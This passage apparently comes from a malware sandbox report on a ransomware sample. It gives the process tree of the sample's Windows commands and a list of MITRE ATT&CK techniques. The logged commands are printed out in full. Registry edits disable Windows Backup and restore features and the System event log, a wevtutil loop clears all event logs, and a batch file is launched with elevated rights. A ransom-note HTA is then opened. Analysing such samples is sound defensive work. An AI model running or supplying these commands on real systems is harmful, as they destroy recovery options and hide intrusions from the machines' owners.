  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:852
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:1476
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:1888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:1912
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:1872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:1508
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:1896
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:868
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:1340
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:1984
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:1212
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:220
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:1028
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer /v DisableMSI /t REG_DWORD /d 1 /f
  2⤵
  PID:740
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer /v DisableMSI /t REG_DWORD /d 1 /f
    3⤵
    PID:1472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:1256
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:1468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for / F "tokens=*" %%s in('wevtutil.exe el') DO wevtutil.exe cl "%%s"
  2⤵
  PID:1444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start XinofSetup.bat
  2⤵
  PID:1792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K XinofSetup.bat
    3⤵
    PID:1680
  - - C:\Windows\system32\PING.EXE
      ping localhost.com -n 1
      4⤵
      Runs ping.exe
      PID:1524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Powershell Start XinofSetup.bat -Verb Runas
  2⤵
  PID:1436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Start XinofSetup.bat -Verb Runas
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1672
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XinofSetup.bat"
      4⤵
      PID:1476
    - - C:\Windows\system32\PING.EXE
        
        ping localhost.com -n 1
        5⤵
        Runs ping.exe
        
        PID:904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "How To Decrypt Files.hta"
  2⤵
  PID:612
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\How To Decrypt Files.hta"
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:812

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1228 -s 1400
1⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:316
- C:\Windows\Explorer.EXE
  "C:\Windows\Explorer.EXE"
  2⤵
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1156

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1040

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/316-156-0x00000000029E0000-0x00000000029F1000-memory.dmp

Filesize
68KB

Download
memory/316-155-0x00000000029E0000-0x00000000029F1000-memory.dmp

Filesize
68KB

Download
memory/316-154-0x0000000001EC0000-0x0000000001ED1000-memory.dmp

Filesize
68KB

Download
memory/1156-232-0x0000000002B00000-0x0000000002B01000-memory.dmp

Filesize
4KB

Download
memory/1156-227-0x0000000002B00000-0x0000000002B01000-memory.dmp

Filesize
4KB

Download
memory/1156-231-0x0000000002A90000-0x0000000002A91000-memory.dmp

Filesize
4KB

Download
memory/1492-19-0x0000000002080000-0x0000000002091000-memory.dmp

Filesize
68KB

Download
memory/1492-18-0x0000000001C70000-0x0000000001C81000-memory.dmp

Filesize
68KB

Download
memory/1492-20-0x0000000001C70000-0x0000000001C81000-memory.dmp

Filesize
68KB

Download